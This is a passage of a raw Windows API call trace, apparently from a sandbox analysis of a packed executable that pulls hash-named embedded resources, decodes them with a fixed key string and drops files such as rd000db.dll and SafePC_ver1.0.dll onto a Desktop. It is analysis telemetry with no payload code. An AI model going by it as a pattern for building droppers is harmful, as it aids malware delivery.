lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe4c*=0x0, lpOverlapped=0x0) returned 1 [0077.049] WriteFile (in: hFile=0x7c, lpBuffer=0x2daf020*, nNumberOfBytesToWrite=0xc4066, lpNumberOfBytesWritten=0x19fe60, lpOverlapped=0x0 | out: lpBuffer=0x2daf020*, lpNumberOfBytesWritten=0x19fe60*=0xc4066, lpOverlapped=0x0) returned 1 [0077.068] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe7c*=0x0, lpOverlapped=0x0) returned 1 [0077.068] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.068] CloseHandle (hObject=0x7c) returned 1 [0077.086] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.086] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68110 | out: hHeap=0x2a60000) returned 1 [0077.086] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x2daf020 | out: hHeap=0x10e0000) returned 1 [0077.091] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex") returned 0x21 [0077.091] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a68110 [0077.091] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.091] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlk.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.091] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.091] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.091] CloseHandle (hObject=0x7c) returned 1 [0077.091] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.091] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68110 | out: hHeap=0x2a60000) returned 1 [0077.091] GetLastError () returned 0x0 [0077.092] SetLastError (dwErrCode=0x0) [0077.092] GetLastError () returned 0x0 [0077.092] SetLastError (dwErrCode=0x0) [0077.092] GetLastError () returned 0x0 [0077.092] SetLastError (dwErrCode=0x0) [0077.092] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex") returned 0x21 [0077.092] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a68218 [0077.092] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x10e07c8 [0077.092] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex", lpszShortPath=0x10e07c8, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex") returned 0x21 [0077.142] GetLastError () returned 0x0 [0077.142] SetLastError (dwErrCode=0x0) [0077.142] GetLastError () returned 0x0 [0077.142] SetLastError (dwErrCode=0x0) [0077.142] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a68740 [0077.142] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07c8 | out: hHeap=0x10e0000) returned 1 [0077.142] GetLastError () returned 0x0 [0077.143] SetLastError (dwErrCode=0x0) [0077.143] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex") returned 0x21 [0077.143] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68218 | out: hHeap=0x2a60000) returned 1 [0077.143] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68740 | out: hHeap=0x2a60000) returned 1 [0077.143] GetLastError () returned 0x0 [0077.143] SetLastError (dwErrCode=0x0) [0077.143] wcslen (_String="b2eincfile") returned 0xa [0077.143] GetLastError () returned 0x0 [0077.143] SetLastError (dwErrCode=0x0) [0077.143] GetLastError () returned 0x0 [0077.143] SetLastError (dwErrCode=0x0) [0077.143] SetEnvironmentVariableW (lpName="b2eincfile2", lpValue="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex") returned 1 [0077.143] GetLastError () returned 0x0 [0077.143] SetLastError (dwErrCode=0x0) [0077.144] GetLastError () returned 0x0 [0077.144] SetLastError (dwErrCode=0x0) [0077.144] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex") returned 0x21 [0077.144] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a686e8 [0077.144] GetLastError () returned 0x0 [0077.144] SetLastError (dwErrCode=0x0) [0077.144] GetLastError () returned 0x0 [0077.144] SetLastError (dwErrCode=0x0) [0077.144] GetLastError () returned 0x0 [0077.144] SetLastError (dwErrCode=0x0) [0077.144] GetLastError () returned 0x0 [0077.144] SetLastError (dwErrCode=0x0) [0077.144] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a911d0 [0077.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rd000db.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.144] malloc (_Size=0xd) returned 0x1121150 [0077.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rd000db.dll", cchWideChar=12, lpMultiByteStr=0x1121150, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rd000db.dll", lpUsedDefaultChar=0x0) returned 12 [0077.144] free (_Block=0x1121150) [0077.144] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.144] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a568, Size=0x5a) returned 0x2a6a498 [0077.144] GetLastError () returned 0x0 [0077.145] SetLastError (dwErrCode=0x0) [0077.145] GetLastError () returned 0x0 [0077.145] SetLastError (dwErrCode=0x0) [0077.145] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a5d0, Size=0x5a) returned 0x2a6a2f8 [0077.145] FindResourceW (hModule=0x400000, lpName="658FADF2E44F7A715AB5C18E913AABCF012533DE", lpType=0xa) returned 0x0 [0077.145] FindResourceW (hModule=0x400000, lpName="ED335210FCBAA319E81C5BA517A7F44E2FDAF856", lpType=0xa) returned 0x8593d8 [0077.145] LoadResource (hModule=0x400000, hResInfo=0x8593d8) returned 0xc3f338 [0077.145] SizeofResource (hModule=0x400000, hResInfo=0x8593d8) returned 0x57930 [0077.145] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x57930) returned 0x2933130 [0077.151] FreeResource (hResData=0xc3f338) returned 0 [0077.151] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x2933130) returned 0x57930 [0077.151] wcslen (_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0077.151] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a68218 [0077.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0077.151] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x298aa68 [0077.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x298aa68, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0077.151] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x298aa68) returned 0x21 [0077.151] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a911d0 [0077.151] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a915f0 [0077.156] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.156] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911d0 [0077.156] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a915f0 | out: hHeap=0x2a90000) returned 1 [0077.156] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911f8 [0077.156] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x298aa68 | out: hHeap=0x10e0000) returned 1 [0077.156] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68218 | out: hHeap=0x2a60000) returned 1 [0077.156] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.156] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911f8 | out: hHeap=0x2a90000) returned 1 [0077.156] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0xa35af) returned 0x2da9020 [0077.159] GetLastError () returned 0x0 [0077.159] SetLastError (dwErrCode=0x0) [0077.159] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0077.159] wcslen (_String="\\") returned 0x1 [0077.159] wcslen (_String="rd000db.dll") returned 0xb [0077.159] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a687f0, Size=0x50) returned 0x2a68110 [0077.159] malloc (_Size=0x1bcc) returned 0x11224f0 [0077.178] free (_Block=0x11224f0) [0077.179] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll") returned 0x23 [0077.179] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a682c8 [0077.179] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll") returned 0x23 [0077.179] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a68588 [0077.179] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.179] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\rd000db.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.179] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.179] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68588 | out: hHeap=0x2a60000) returned 1 [0077.179] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.179] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\rd000db.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.180] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.180] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fe68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19fe68*=0) returned 0x0 [0077.180] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe4c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe4c*=0x0, lpOverlapped=0x0) returned 1 [0077.180] WriteFile (in: hFile=0x7c, lpBuffer=0x2da9020*, nNumberOfBytesToWrite=0xa35af, lpNumberOfBytesWritten=0x19fe60, lpOverlapped=0x0 | out: lpBuffer=0x2da9020*, lpNumberOfBytesWritten=0x19fe60*=0xa35af, lpOverlapped=0x0) returned 1 [0077.242] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe7c*=0x0, lpOverlapped=0x0) returned 1 [0077.242] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.242] CloseHandle (hObject=0x7c) returned 1 [0077.358] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.358] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a682c8 | out: hHeap=0x2a60000) returned 1 [0077.358] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x2da9020 | out: hHeap=0x10e0000) returned 1 [0077.363] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll") returned 0x23 [0077.363] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a68638 [0077.363] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.363] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\rd000db.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.363] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.363] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.363] CloseHandle (hObject=0x7c) returned 1 [0077.363] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.363] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68638 | out: hHeap=0x2a60000) returned 1 [0077.363] GetLastError () returned 0x0 [0077.363] SetLastError (dwErrCode=0x0) [0077.364] GetLastError () returned 0x0 [0077.364] SetLastError (dwErrCode=0x0) [0077.364] GetLastError () returned 0x0 [0077.364] SetLastError (dwErrCode=0x0) [0077.364] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll") returned 0x23 [0077.364] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a68168 [0077.364] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x10e07c8 [0077.364] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll", lpszShortPath=0x10e07c8, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll") returned 0x23 [0077.364] GetLastError () returned 0x0 [0077.364] SetLastError (dwErrCode=0x0) [0077.364] GetLastError () returned 0x0 [0077.364] SetLastError (dwErrCode=0x0) [0077.364] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a68218 [0077.364] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07c8 | out: hHeap=0x10e0000) returned 1 [0077.364] GetLastError () returned 0x0 [0077.364] SetLastError (dwErrCode=0x0) [0077.364] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll") returned 0x23 [0077.365] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68168 | out: hHeap=0x2a60000) returned 1 [0077.365] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68218 | out: hHeap=0x2a60000) returned 1 [0077.365] GetLastError () returned 0x0 [0077.365] SetLastError (dwErrCode=0x0) [0077.365] wcslen (_String="b2eincfile") returned 0xa [0077.365] GetLastError () returned 0x0 [0077.365] SetLastError (dwErrCode=0x0) [0077.365] GetLastError () returned 0x0 [0077.365] SetLastError (dwErrCode=0x0) [0077.365] SetEnvironmentVariableW (lpName="b2eincfile3", lpValue="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll") returned 1 [0077.365] GetLastError () returned 0x0 [0077.365] SetLastError (dwErrCode=0x0) [0077.366] GetLastError () returned 0x0 [0077.366] SetLastError (dwErrCode=0x0) [0077.366] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll") returned 0x23 [0077.366] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a68378 [0077.366] GetLastError () returned 0x0 [0077.366] SetLastError (dwErrCode=0x0) [0077.366] GetLastError () returned 0x0 [0077.366] SetLastError (dwErrCode=0x0) [0077.366] GetLastError () returned 0x0 [0077.366] SetLastError (dwErrCode=0x0) [0077.366] GetLastError () returned 0x0 [0077.366] SetLastError (dwErrCode=0x0) [0077.366] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a911d0 [0077.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SafePC_ver1.0.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0077.366] malloc (_Size=0x13) returned 0x1121150 [0077.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SafePC_ver1.0.dll", cchWideChar=18, lpMultiByteStr=0x1121150, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SafePC_ver1.0.dll", lpUsedDefaultChar=0x0) returned 18 [0077.366] free (_Block=0x1121150) [0077.366] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.367] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a498, Size=0x5a) returned 0x2a6a228 [0077.367] GetLastError () returned 0x0 [0077.367] SetLastError (dwErrCode=0x0) [0077.367] GetLastError () returned 0x0 [0077.367] SetLastError (dwErrCode=0x0) [0077.367] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a2f8, Size=0x5a) returned 0x2a6a638 [0077.367] FindResourceW (hModule=0x400000, lpName="EC811D3CEBA539776B1D32AA22696B70FC003FC3", lpType=0xa) returned 0x0 [0077.367] FindResourceW (hModule=0x400000, lpName="3CF300CF07B69622AA23D1B677935ABEC3D118CE", lpType=0xa) returned 0x8592c0 [0077.367] LoadResource (hModule=0x400000, hResInfo=0x8592c0) returned 0xbcebb8 [0077.367] SizeofResource (hModule=0x400000, hResInfo=0x8592c0) returned 0x4c20 [0077.367] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x4c20) returned 0x10e07c8 [0077.368] FreeResource (hResData=0xbcebb8) returned 0 [0077.368] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e07c8) returned 0x4c20 [0077.368] wcslen (_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0077.368] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a685e0 [0077.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0077.368] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x298aa68 [0077.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x298aa68, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0077.368] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x298aa68) returned 0x21 [0077.368] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a911d0 [0077.368] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a915f0 [0077.368] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.368] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911d0 [0077.368] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a915f0 | out: hHeap=0x2a90000) returned 1 [0077.368] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911f8 [0077.369] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x298aa68 | out: hHeap=0x10e0000) returned 1 [0077.369] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a685e0 | out: hHeap=0x2a60000) returned 1 [0077.369] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.369] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911f8 | out: hHeap=0x2a90000) returned 1 [0077.369] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0xb000) returned 0x298aa68 [0077.370] GetLastError () returned 0x0 [0077.370] SetLastError (dwErrCode=0x0) [0077.370] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0077.370] wcslen (_String="\\") returned 0x1 [0077.370] wcslen (_String="SafePC_ver1.0.dll") returned 0x11 [0077.370] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68110, Size=0x5c) returned 0x2a6a5d0 [0077.370] malloc (_Size=0x1bcc) returned 0x11224f0 [0077.370] free (_Block=0x11224f0) [0077.370] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll") returned 0x29 [0077.370] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5c) returned 0x2a6a770 [0077.370] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll") returned 0x29 [0077.371] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5c) returned 0x2a6a708 [0077.371] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\safepc_ver1.0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.371] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.371] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a708 | out: hHeap=0x2a60000) returned 1 [0077.371] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\safepc_ver1.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.372] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.372] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fe68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19fe68*=0) returned 0x0 [0077.372] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe4c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe4c*=0x0, lpOverlapped=0x0) returned 1 [0077.372] WriteFile (in: hFile=0x7c, lpBuffer=0x298aa68*, nNumberOfBytesToWrite=0xb000, lpNumberOfBytesWritten=0x19fe60, lpOverlapped=0x0 | out: lpBuffer=0x298aa68*, lpNumberOfBytesWritten=0x19fe60*=0xb000, lpOverlapped=0x0) returned 1 [0077.375] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe7c*=0x0, lpOverlapped=0x0) returned 1 [0077.375] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.375] CloseHandle (hObject=0x7c) returned 1 [0077.377] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.377] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a770 | out: hHeap=0x2a60000) returned 1 [0077.377] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x298aa68 | out: hHeap=0x10e0000) returned 1 [0077.377] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll") returned 0x29 [0077.377] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5c) returned 0x2a6a770 [0077.377] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\safepc_ver1.0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.378] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.378] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.378] CloseHandle (hObject=0x7c) returned 1 [0077.378] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.378] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a770 | out: hHeap=0x2a60000) returned 1 [0077.378] GetLastError () returned 0x0 [0077.378] SetLastError (dwErrCode=0x0) [0077.378] GetLastError () returned 0x0 [0077.378] SetLastError (dwErrCode=0x0) [0077.378] GetLastError () returned 0x0 [0077.378] SetLastError (dwErrCode=0x0) [0077.378] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll") returned 0x29 [0077.378] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5c) returned 0x2a6a6a0 [0077.378] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x10e53f0 [0077.378] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll", lpszShortPath=0x10e53f0, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop\\SAFEPC~1.DLL") returned 0x24 [0077.379] GetLastError () returned 0x0 [0077.379] SetLastError (dwErrCode=0x0) [0077.379] GetLastError () returned 0x0 [0077.379] SetLastError (dwErrCode=0x0) [0077.379] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x52) returned 0x2a6abc8 [0077.379] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e53f0 | out: hHeap=0x10e0000) returned 1 [0077.379] GetLastError () returned 0x0 [0077.379] SetLastError (dwErrCode=0x0) [0077.379] wcslen 